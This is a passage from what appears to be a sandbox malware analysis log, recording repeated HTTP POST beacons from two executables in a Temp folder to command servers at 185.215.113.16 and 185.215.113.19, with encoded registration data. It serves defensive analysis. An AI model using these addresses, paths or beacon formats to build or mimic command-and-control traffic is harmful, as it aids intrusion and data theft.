Jul 26, 2024 17:58:00.001413107 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:58:00.250422955 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:58:00.515955925 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.5	61435	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:59.259704113 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:00.072590113 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:58:00.254390955 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:58:00.515985966 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.5	61454	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:00.638822079 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:01.409567118 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:58:01.410310984 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:58:01.662631035 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.5	61455	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:00.638983965 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:01.417581081 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:58:01.418525934 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:58:01.671658993 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.5	61465	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:01.792026997 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:02.558130980 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:58:02.625914097 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:58:02.878238916 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.5	61466	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:01.796538115 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:02.561793089 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:58:02.626386881 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:58:02.880141973 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.5	61471	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:02.999252081 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:03.800841093 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:58:03.803468943 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:58:04.055958033 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.5	61472	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:02.999300957 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:03.797051907 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:58:03.799674034 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:58:04.051472902 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.5	61482	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:04.235253096 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:05.048413992 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:58:05.049937963 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:58:05.294310093 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.5	61483	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:04.235366106 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:05.048222065 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:58:05.051233053 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:58:05.296263933 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.5	61486	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:05.410098076 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:06.180119038 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:58:06.181097031 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:58:06.428917885 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.5	61487	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:05.410238028 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:06.183546066 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.5	61489	185.215.113.16	80

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:06.198029995 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:58:06.978384018 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.5	61490	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:06.546297073 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:07.308093071 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.5	61491	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:07.120352983 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:07.877670050 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.5	61492	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
